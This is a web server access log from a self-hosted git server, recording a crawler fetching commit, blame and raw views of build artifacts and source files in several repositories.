"/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9973] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21732] [Gzip 28.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9974] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21731] [Gzip 28.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9963] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9964] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9962] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9939] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 9961] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21627] [Gzip 28.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:47:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" -[17/Feb/2026:16:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21627] [Gzip 28.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:47:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 21627] [Gzip 28.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:47:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 12648] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" -[17/Feb/2026:16:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72031] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72003] [Gzip 33.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72035] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72032] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72033] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 28704] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" -[17/Feb/2026:16:47:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:47:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11040] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:47:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11041] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11041] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:47:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14310] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11041] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject/build/CMakeFiles/Makefile2" -[17/Feb/2026:16:47:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/mail_contact.py?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/mail_contact.py" -[17/Feb/2026:16:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9929] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:47:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9918] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:16:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?state=closed" [Client 74.7.227.38] [Length 8483] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones" -[17/Feb/2026:16:47:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10901] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:16:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/api_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 10932] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__" -[17/Feb/2026:16:47:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10908] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/.gitignore" -[17/Feb/2026:16:47:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" -[17/Feb/2026:16:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll?display=rendered" [Client 74.7.227.38] [Length 10836] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/libwinpthread-1.dll" -[17/Feb/2026:16:47:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10923] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldSpotMonitor_Final.spec" -[17/Feb/2026:16:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py?display=rendered" [Client 74.7.227.38] [Length 10903] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor-VeryGood2.py" -[17/Feb/2026:16:47:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr 